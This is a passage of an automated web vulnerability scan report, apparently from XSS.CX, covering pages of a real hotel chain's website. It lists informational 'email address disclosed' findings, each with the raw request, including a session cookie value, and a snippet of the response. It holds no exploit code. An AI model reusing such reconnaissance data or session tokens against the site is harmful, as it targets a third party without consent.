Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/business-pleasure

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay/business-pleasure HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:46:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:46:02 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Business or Pleasure - Boutique
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.100. http://www.redcarnationhotels.com/your-stay/family  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/family

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay/family HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:01 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>5 Star Luxury Child and Family
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.101. http://www.redcarnationhotels.com/your-stay/female-traveller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/female-traveller

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay/female-traveller HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:47:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Female Friendly Hotels - Red Ca
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.102. http://www.redcarnationhotels.com/your-stay/pets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/pets

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay/pets HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:03 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Pet and Dog Friendly Hot
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.103. http://www.redcarnationhotels.com/your-stay/rch-video-tour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/rch-video-tour

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay/rch-video-tour HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:45:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:45:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>RCH Video Tour</title>
<meta ht
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.104. http://www.redcarnationhotels.com/your-stay/thoughtul-touches  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/thoughtul-touches

Issue detail

The following email address was disclosed in the response:

Request

GET /your-stay/thoughtul-touches HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:45:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:45:51 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thoughtful Touches - Boutique H
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
Report generated by XSS.CX at Tue Oct 12 19:32:54 CDT 2010.